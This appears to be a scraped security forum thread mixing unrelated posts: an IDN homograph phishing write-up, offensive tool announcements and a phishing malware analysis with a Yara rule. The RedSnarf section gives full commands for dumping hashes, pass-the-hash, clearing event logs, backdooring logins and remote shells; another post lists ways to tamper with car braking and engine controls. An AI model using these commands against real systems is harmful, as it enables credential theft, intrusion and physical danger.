Leaderboard

If I told you this could be a phishing site, would you believed me? tl;dr: check out the proof-of-concept Punycode makes it possible to register domains with foreign characters. It works by converting individual domain label to an alternative format using only ASCII characters. For example, the domain "xn--s7y.co" is equivalent to "短.co". From a security perspective, Unicode domains can be problematic because many Unicode characters are difficult to distinguish from common ASCII characters. It is possible to register domains such as "xn--pple-43d.com", which is equivalent to "аpple.com". It may not be obvious at first glance, but "аpple.com" uses the Cyrillic "а" (U+0430) rather than the ASCII "a" (U+0041). This is known as a homograph attack. Fortunately modern browsers have mechanisms in place to limit IDN homograph attacks. The page IDN in Google Chrome highlights the conditions under which an IDN is displayed in its native Unicode form. In Chrome and Firefox, the Unicode form will be hidden if a domain label contains characters from multiple different languages. The "аpple.com" domain as described above will appear in its Punycode form as "xn--pple-43d.com" to limit confusion with the real "apple.com". Chrome's (and Firefox's) homograph protection mechanism unfortunately fails if every characters is replaced with a similar character from a single foreign language. The domain "аррӏе.com", registered as "xn--80ak6aa92e.com", bypasses the filter by only using Cyrillic characters. You can check this out yourself in the proof-of-concept using Chrome or Firefox. In many instances, the font in Chrome and Firefox makes the two domains visually indistinguishable. It becomes impossible to identify the site as fraudulent without carefully inspecting the site's URL or SSL certificate. This program nicely demonstrates the difference between the two sets of characters. Internet Explorer and Safari are fortunately not vulnerable. Screenshots: Chrome, Firefox, Firefox SSL This bug was reported to Chrome and Firefox on January 20, 2017 and was fixed in the trunk of Chrome 59 (currently in Canary) on March 24, 2017. The problem remains unaddressed in Firefox as they remain undecided whether it is within their scope. The Bugzilla issue was initially marked "RESOLVED" and "WONTFIX", though it has since been reopened, made public, and given the "sec-low" keyword. Our IDN threat model specifically excludes whole-script homographs, because they can't be detected programmatically and our "TLD whitelist" approach didn't scale in the face of a large number of new TLDs. If you are buying a domain in a registry which does not have proper anti-spoofing protections (like .com), it is sadly the responsibility of domain owners to check for whole-script homographs and register them. A simple way to limit the damage from bugs such as this is to always use a password manager. In general, users must be very careful and pay attention to the URL when entering personal information. I hope Firefox will consider implementing a fix to this problem since this can cause serious confusion even for those who are extremely mindful of phishing. You can follow me on Twitter @Xudong_Zheng Sursa: https://www.xudongz.com/blog/2017/idn-phishing/

multumim la fel, da cred ca ti-ai ales locul nepotrivit sa zici asta

Gata cu hostingu', acuma folosesti domeniul pentru distribuirea resurselor si tutorialelor in domeniul IT :))), vezi sa nu faci tutoriale despre imprumuturi cu buletinele altora

Cred ca poti face multe: Se poate face remapping la injectie. La diesel cu rampa comuna ai undeva la 200 bars la pornirea motorului iar in sarcina, chiar si 2200 bari. Poti face remapping sa sara cu totul de acolo. Se poate rescrie sistemul de asistenta stabilitate + sistemul de franare (ABS / ASR / ESP) Se pot modifica parametrii introdusi despre dimensiunea rotilor. Ma refer la diametrul lor exterior. Aviz amatorilor care isi pun roti si fac tuning dupa ureche: ECU neavand informatii ca voi schimbati rotile si le puneti mai mari, nu mai stie sa calculeze cu exactitate distantele de franare, nu mai stie cum sa actioneze ABS-ul exact iar viteza indicata pe bord va fi total eronata. Se pot bloca usile + geamurile permanent (sistemul anti panica) Se pot aprinde/stinge orice fel de consumator (audio, lumini) Se pot dezactiva senzori de parcare, senzorii de lumina, senzorii de ploaie cat si unele valve (ex: egr) La masinile moderne se pot modifica inclusiv timpii de deschidere pentru supape. Se poate opri/porni motorul sau opri ventilatorul radiatorului (termocupla, etc) Se pot "bloca" injectoarele in pozitia deschis sau inchis. Se pot modifica parametrii de compensare pe injectoare cat si codurile acestora (recoding) Se poate modifica amestecul carburant (proportia de amestec) ...... cam atat ca le dau idei unora. Ah, cacat, tocmai le-am dat o parte Limitari: Nu functioneaza cu un rahat de dongle. Probabil si autorii articolului au uitat sa specifice. Chestiile gen ELM327 sunt doar pentru citit parametrii ecu, nu si pentru scris. Nu se schimba parametrii "on the fly". Motorul trebuie oprit si la urmatoarea pornire va avea parametrii rescrisi.

Using PowerShell for Penetration Testing Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security and post exploitation during Penetraion Tests. The scripts are written on the basis of requirement by the author during real Penetration Tests. Payloads: It contains many interesting scripts like download and execute, keylogger, dns txt pwnage, wait for command and much more. Help: All payloads and scripts are Get-Help compatible. Use "Get-Help <scriptname.ps1> -full" on a PowerShell prompt to get full help details. Download: http://nishang.googlecode.com/files/nishang_0.3.0.zip

pentru ca trolli si pentru ca shemale

raportat, rezolvat, astept banii... bani putini, dar e ok... ajunge de cateva beri Destept esti tu, doame ajuta! Daca a zis omul ca e rezolvat si raportat. Normal ca a facut postul dupa ce a anuntat facebook si dupa ce facebook a rezolvat problema si i-a dat voie sa faca disclosure.

https://github.com/x0rz/EQGRP

ShadowBrokers: The NSA compromised the SWIFT Network

a Simple tool and not very special but this tool fast and easy create backdoor office exploitation using module metasploit packet. Like Microsoft Office in windows or mac , Open Office in linux , Macro attack , Buffer Overflow in word . Work in kali rolling , Parrot , Backbox . Download: https://github.com/Screetsec/Microsploit

New link: https://github.com/samratashok/nishang

Recent google ia in considerare protocolul https:// mai mult decat pana acum, iar efectele le-am simtit si eu. Totusi nu recomand certificatele free care tot circula pe net. Studiu de caz: Pe protocol http:// In acelasi timp, certificatul SSL luat la infiintarea site-ului incepe sa dea roade. Desi aveam ambele versiuni up, nu fortam protocolul https:// din .htaccess, google a decis sa-mi rankeze versiunea https:// in schimbul protocolului normal.

jucarii noi https://github.com/misterch0c/shadowbroker/

Muie pentru toti fraierii care imi dau ban pe chat!!!!!

______ .____________ _____ \______ \ ____ __| _/ _____/ ____ _____ ________/ ____\ | _// __ \ / __ |\_____ \ / \\__ \\_ __ \ __\ | | \ ___// /_/ |/ \ | \/ __ \| | \/| | |____|_ /\___ >____ /_______ /___| (____ /__| |__| \/ \/ \/ \/ \/ \/ RedSnarf is a pen-testing / red-teaming tool by Ed William and Richard Davy for retrieving hashes and credentials from Windows workstations, servers and domain controllers using OpSec Safe Techniques. RedSnarf functionality includes: • Retrieval of local SAM hashes; • Enumeration of user/s running with elevated system privileges and their corresponding lsa secrets password; • Retrieval of MS cached credentials; • Pass-the-hash; • Quickly identify weak and guessable username/password combinations (default of administrator/Password01); • The ability to retrieve hashes across a range; • Hash spraying - o Credsfile will accept a mix of pwdump, fgdump and plain text username and password separated by a space; • Lsass dump for offline analysis with Mimikatz; • Dumping of Domain controller hashes using NTDSUtil and retrieval of NTDS.dit for local parsing; • Dumping of Domain controller hashes using the drsuapi method; • Retrieval of Scripts and Policies folder from a Domain controller and parsing for 'password' and 'administrator'; • Ability to decrypt cpassword hashes; • Ability to start a shell on a remote machine; • The ability to clear the event logs (application, security, setup or system); (Internal Version only) • Results are saved on a per-host basis for analysis. • Enable/Disable RDP on a remote machine. • Change RDP port from 3389 to 443 on a remote machine. • Enable/Disable NLA on a remote machine. • Find where users are logged in on remote machines. • Backdoor Windows Logon Screen • Enable/Disable UAC on a remote machine. • Stealth mimikatz added. • Parsing of domain hashes • Ability to determine which accounts are enabled/disabled RedSnarf Usage ======================= Requirements: Impacket v0.9.16-dev - https://github.com/CoreSecurity/impacket.git CredDump7 - https://github.com/Neohapsis/creddump7 Lsass Retrieval using procdump - https://technet.microsoft.com/en-us/sysinternals/dd996900.aspx Netaddr (0.7.12) - pip install netaddr Termcolor (1.1.0) - pip install termcolor iconv - used with parsing Mimikatz info locally Show Help ./redsnarf.py -h ./redsnarf.py --help Retrieve Local Hashes ======================= Retrieve Local Hashes from a single machine using weak local credentials and clearing the Security event log ./redsnarf.py -H ip=10.0.0.50 -uC security Retrieve Local Hashes from a single machine using weak local credentials and clearing the application event log ./redsnarf.py -H ip=10.0.0.50 -uC application Retrieve Local Hashes from a single machine using local administrator credentials ./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d . Retrieve Local Hashes from a single machine using domain administrator credentials ./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com Retrieve Hashes across a network range using local administrator credentials ./redsnarf.py -H range=10.0.0.1/24 -u administrator -p Password01 -d . Retrieve Hashes across a network range using domain administrator credentials ./redsnarf.py -H range=10.0.0.1/24 -u administrator -p Password01 -d yourdomain.com Retrieve Hashes across a network range using domain administrator credentials ./redsnarf.py -H file=targets.txt -u administrator -p Password01 -d yourdomain.com Hash Spraying ======================= Spray Hashes across a network range ./redsnarf.py -H range=10.0.0.1/24 -hS credsfile -d . Retrieve Hashes across a network range domain login ./redsnarf.py -H range=10.0.0.1/24 -hS credsfile -d yourdomain.com Quickly Check Credentials ./redsnarf.py -H ip=10.0.0.1 -u administrator -p Password1 -d . -cQ y Quickly Check File containing usernames (-hS) and a generic password (-hP) ./redsnarf.py -H ip=10.0.0.1 -hS /path/to/usernames.txt -hP PasswordToTry -cQ y Retrieve Domain Hashes ======================= Retrieve Hashes using drsuapi method (Quickest) This method supports an optional flag of -q y which will query LDAP and output whether accounts are live or disabled ./redsnarf.py -H ip=10.0.0.1 -u administrator -p Password01 -d yourdomain.com -hI y (-hQ y) Retrieve Hashes using NTDSUtil This method supports an optional flag of -q y which will query LDAP and output whether accounts are live or disabled ./redsnarf.py -H ip=10.0.0.1 -u administrator -p Password01 -d yourdomain.com -hN y (-hQ y) Information Gathering ======================= Copy the Policies and Scripts folder from a Domain Controller and parse for password and administrator ./redsnarf.py -H ip=10.0.0.1 -u administrator -p Password01 -d yourdomain.com -uP y Decrypt Cpassword ./redsnarf.py -uG cpassword Find User - Live /redsnarf.py -H range=10.0.0.1/24 -u administrator -p Password01 -d yourdomain.com -eL user.name Find User - Offline (searches pre downloaded information) /redsnarf.py -H range=10.0.0.1/24 -u administrator -p Password01 -d yourdomain.com -eO user.name Misc ======================= Start a Shell on a machine using local administrator credentials ./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d . -uD y Start a Shell on a machine using domain administrator credentials ./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -uD y Retrieve a copy of lsass for offline parsing with Mimikatz on a machine using local administrator credentials ./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d . -hL y Run stealth mimikatz, this option fires up a web-server to serve a powershell script, this is obfusctaed and encoded machine side, data doesnt touch disk - creds are grepped for in an easy to read style and echoed back to screen. ./redsnarf.py -H ip=192.168.198.162 -u administrator -p Password01 -cS y -hR y Run Custom Command Example 1 ./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -uX 'net user' Example 2 - Double Quotes need to be escaped with \ ./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -uX 'dsquery group -name \"domain admins\" | dsget group -members -expand' Local Access Token Policy Creates a batch file lat.bat which you can copy and paste to the remote machine to execute which will modify the registry and either enable or disable Local Access Token Policy settings. ./redsnarf.py -rL y Wdigest Enable UseLogonCredential Wdigest registry value on a machine using domain administrator credentials ./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rW e Disable UseLogonCredential Wdigest registry value on a machine using domain administrator credentials ./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rW d Query UseLogonCredential Wdigest registry value on a machine using domain administrator credentials ./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rW q UAC Enable UAC registry value on a machine using domain administrator credentials ./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rU e Disable UAC registry value on a machine using domain administrator credentials ./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rU d Query UAC registry value on a machine using domain administrator credentials ./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rU q Backdoor - Backdoor Windows Screen - Press Left Shift + Left Alt + Print Screen to activate Enable Backdoor registry value on a machine using domain administrator credentials ./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rB e Disable Backdoor registry value on a machine using domain administrator credentials ./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rB d Query Backdoor registry value on a machine using domain administrator credentials ./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rB q RDP ======================= RDP Enable RDP on a machine using domain administrator credentials ./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rR e Disable RDP on a machine using domain administrator credentials ./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rR d Query RDP status on a machine using domain administrator credentials ./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rR q Change RDP Port from 3389 to 443 - Change RDP Port to 443 on a machine using domain administrator credentials ./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rT e Change RDP Port to default of 3389 on a machine using domain administrator credentials ./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rT d Query RDP Port Value on a machine using domain administrator credentials ./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rT q NLA ======================= Enable NLA on a machine using domain administrator credentials ./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rN e Disable NLA on a machine using domain administrator credentials ./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rN d Query NLA status on a machine using domain administrator credentials ./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rN q Sursa: https://github.com/nccgroup/redsnarf

See if this works https://mega.nz/#F!G8Q3AYgB!BXmehFrgsicXqsmUc5FZYw

Python and Powershell internal penetration testing framework Pentestly is a combination of expanding Python tools for use in penetration tests. The goal is to utilize a familiar user interface while making contributions to the framework easy with the power of Python. Current features Import NMAP XML Test SMB authentication using: individual credentials file containing credentials null credentials NTLM hash Test local administrator privileges for successful SMB authentication Identify readable SMB shares for valid credentials Store Domain/Enterprise Admin account names Determine location of running Domain Admin processes Determine systems of logged in Domain Admins Execute Powershell commands in memory and exfil results Execute Mimikatz to gather plaintext password from memory (Invoke-Mimikatz.ps1) Receive a command shell (Powercat) Receive a meterpreter session (Invoke-Shellcode.ps1) Shoulders of Giants Pentestly stands on the shoulders of giants. Below are the current tools utilized in Pentestly: recon-ng – Backend database for recon-ng is beautifully made and leveraged in Pentestly for data manipulation wmiexec.py – Allows us to execute Powershell commands quickly and easily via WMI smbmap.py – Useful utility for enumerating SMB shares Invoke-Mimikatz.ps1 – Implementation of Mimikatz in Powershell powercat.ps1 – Netcat-esque functionality in Powershell Invoke-Shellcode.ps1 – Deploy Meterpreter in Powershell Install git clone https://github.com/praetorian-inc/pentestly.git ./install.sh ./pentestly Source: https://n0where.net/powershell-penetration-testing-framework-pentestly/

MS Word and Macros… Now With Social Engineering Malware December 15, 2014 By Ronnie Tokazowski On December 11, one of our employees reported a phishing email with PhishMe’s Reporter for Outlook that contained a particularly nasty Word document. The malicious payload included PowerShell, VBA, and batch code. Here’s a screenshot of the phishing email: Figure 1 — Screenshot of phishing email Once opened, the document’s contents are blurred, and it asks recipients to enable macros in order to view the document. Figure 2 — Document requesting that user enable macros Once enabled, the macro kicks off by executing a batch script via cmd.exe, which then executes visual basic script, which in turn triggers a PowerShell script. (Figure 3.) Figure 3 — Chain of execution for Word document The batch file is responsible for pinging 1.1.2.2 twice, changing the console code to the Cyrillic script (chcp 1251), and running the second file, adobeacd-update.vbs. (Figure 4.) Figure 4 — Batch file exectued by macro Next, the VBS file runs a powershell script with the command seen in Figure 5. Figure 5 — VBS file executing PowerShell script The powershell code is where the malware is finally downloaded. First, the file downloads “x.exe” from the domain highlighted, then saves it to the system as the filename “444.exe”. Figure 6 — Excerpt of PowerShell script Next, the script grabs the path name of the above scripts, saves them to a variable, sleeps for 15 seconds, and runs “444.exe”. Figure 7 — PowerShell excerpt that executes “444.exe” Once executed, the powershell script attempts to clean up by removing the other scripts used to execute it. Figure 8 — Attempted cleanup for the malware By looking in Wireshark, we can see the file being downloaded in Figure 9. Figure 9 — Malware being downloaded While the malware is packed, we can find some interesting things about the malware by analyzing the memory. First, by grepping before and after “[tab”, we can see that this malware has key logging capabilities, will more than likely beacon out to “tdglomeme[d]eu”, attempt to POST to “/log/index.php”, and feed the information back containing the string “0USER0”. (Figure 10.) Figure 10 — Memory dump of data being collected By looking at the pcap (Figure 11) and decoding the data (Figure 12) we can see that the data is presented exactly as seen in the pcap. Figure 11 — Data from pcap Figure 12 — Decoded data from pcap We can see that the malware is capable of copying contents from the clipboard as well as logging keystrokes. This data is then POSTed back to the attackers domain. For a Yara signature, the attackers included a “vbaProject.bin” file in the docx file. The following Yara rule can help to pick up variants that contain this: rule PM_docx_with_vba_bin { strings: $a1 = “PK” $a2 = “word/_rels/vbaProject.bin” condition: $a1 at 0 and $a2 } The word document has a very low detection rate (4/56) and can be found here: https://www.virustotal.com/en/file/a8ee9b6f3dfd02957d2f9f8abada269cbf7257a0d5745f2bae63c2a6892b83c5/analysis/ Sursa: MS Word and Macros... Now With Social Engineering Malware - PhishMe

Introduction to hacking with PowerShell - Scott Busby Sursa: Introduction to hacking with PowerShell - Scott Busby (BSides Huntsville 2014) (Hacking Illustrated Series InfoSec Tutorial Videos)

[h=1]PowerSploit: A PowerShell Post-Exploitation Framework![/h] July 23, 2012 By Mayuresh At first, there was Syringe from SecureState. It was expanded upon and a slightly more featured PowerShell-based code/DLL injection utility – Powersyringe. The same author – Matt Graeber – improved upon it again to program PowerSploit. So, PowerSploit is a series of Microsoft PowerShell scripts that can be used in post-exploitation scenarios during authorized penetration tests. It retains much of the same functionality of Powersyringe but each payload is divided into a separate script according to functionality. Additionally, the PowerSyringe code was completely rewritten from scratch. All scripts are now in conformance with proper PowerShell verb-noun agreement and are entirely memory-resident (thanks to certain internal .NET methods and reflection)! PowerSploit also features improved error handing, allowing error handlers to pick up on every fault! [h=2]PowerSploit is comprised of the following scripts:[/h] Inject-Dll: Inject-Dll injects a Dll into the process ID of your choosing. Inject-Shellcode: Inject-Shellcode injects shellcode into the process ID of your choosing or within PowerShell locally. It supports windows/meterpreter/reverse_http and windows/meterpreter/reverse_https payloads too! Encrypt-Script: Encrypt-Script will encrypt a script (or any text file for that matter) and output the results to a minimally obfuscated script – evil.ps1. Get-GPPPassword: Get-GPPPassword retrieves the plaintext password for accounts pushed through Group Policy in groups.xml. Used with permission from @obscuresec (obscuresec). Invoke-ReverseDnsLookup: Invoke-ReverseDnsLookup scans an IP address range for DNS PTR records. This script is useful for performing DNS reconnaissance prior to conducting an authorized penetration test. Get-PEHeader: Get-PEHeader is the newest in-memory and on-disk PE parsing utility. Get-PEArchitecture: Get-PEArchitecture returns the architecture for which an executable was compiled. Get-DllLoadPath: Get-DllLoadPath returns the path from which Windows will load a Dll for the given executable. Get-ILDisassembly: Disassembles a raw MSIL byte array passed in from a MethodInfo object in a manner similar to that of Ildasm. So you can see that in addition to a lot of general purpose scripts, you have a lot of scripts that allow you to work with portable executable’s (PE’s) and reverse engineering (RE). Since this is an open source project, all of this can surely be improved upon. A writing style guide also has been provided by the author on the GitHub page, with the 3 clause BSD license, where this project is hosted. [h=3]Download PowerSploit:[/h]PowerSploit.zip and project home page. Sursa: PowerSploit: A PowerShell Post-Exploitation Framework! — PenTestIT

intentia era de a afla unele chestii business ... intamplator m-am gandit sa gasesc xss aici.. raportat, rezolvat, astept banii... bani putini, dar e ok... ajunge de cateva beri edit: daca nu apar la hall of shit fame, nu am vrut eu... ai varianta de a te lauda acolo la ei pe site, dar poti sa si refuzi.

IBM® Security AppScan® version 9.0.3 IBM® Security AppScan® is a web application and web services penetration testing solution for the security specialist. Get a quick start by using a built-in Scan Configuration Wizard. Obtain a thorough security assessment of your web applications and web services. Learn about vulnerabilities and how to resolve them with comprehensive advisories and fix recommendations. Communicate vulnerabilities to development teams using detailed PDF reports. Determine areas of non-compliance to industry regulations. Download : http://intosec.ir/tools/ibm-security-appscan-version-9-0-3/

Nu e adevarat. https://www.facebook.com/careers/search/?q=&defined=http('meth:post'/data='q=/xss:protection')&location=null Fals. -1

Sfintele Sărbători de Paște să vă aducă, în primul rând, ceea ce nu se poate cumpăra: sănătate, dragoste și prietenie!